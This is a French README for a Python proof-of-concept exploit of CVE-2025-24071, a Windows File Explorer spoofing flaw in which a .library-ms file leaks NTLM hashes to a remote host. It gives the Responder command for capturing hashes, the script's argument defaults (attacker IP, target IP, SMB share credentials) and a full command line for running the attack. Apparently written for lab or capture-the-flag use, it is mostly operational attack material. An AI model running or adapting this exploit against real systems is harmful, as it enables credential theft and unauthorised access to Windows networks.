
Script Python pour exécuter CVE-2025-24071
Ce projet détecte et démontre l'exploitation d'une vulnérabilité d'usurpation de l'Explorateur de fichiers Windows.
Le problème provient d'un fichier de bibliothèque Windows (.library-ms) contenant un chemin réseau, soit en pièce jointe directe, soit intégré dans une archive.
Lorsqu'il est ouvert, le fichier peut entraîner une fuite de hachages NTLM vers un emplacement réseau distant (potentiellement malveillant).
Sur votre machine d'attaque, exécutez Responder pour capturer les hachages NTLM :
sudo responder -I tun0 -wvF
Vous pouvez configurer le script de deux manières :
✅ Option A : Modifier les valeurs par défaut (le plus simple)
Modifiez les paramètres par défaut directement dans le script.
parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP") #your IP
parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP") #target IP
parser.add_argument("--share-name", default="IT", help="SMB share name") #name of the share you have access to without the /
parser.add_argument("--username", default="USERNAME", help="SMB username") #username of the share owner
parser.add_argument("--password", default="PASSWORD", help="SMB password") #password of the share owner
parser.add_argument("--interface", default="tun0", help="Responder network interface") #check ifconfig but tun0 will work if you're on a vpn
return parser.parse_args()
✅ Option B : Exécuter avec les paramètres en ligne de commande
Exécutez avec des arguments :
python3 CVE-2025-24071.py \
--attacker-ip <ATTACKER_IP> \
--target-ip <TARGET_IP> \
--share-name <SHARE_NAME> \
--username <USERNAME> \
--password <PASSWORD> \
--interface <INTERFACE>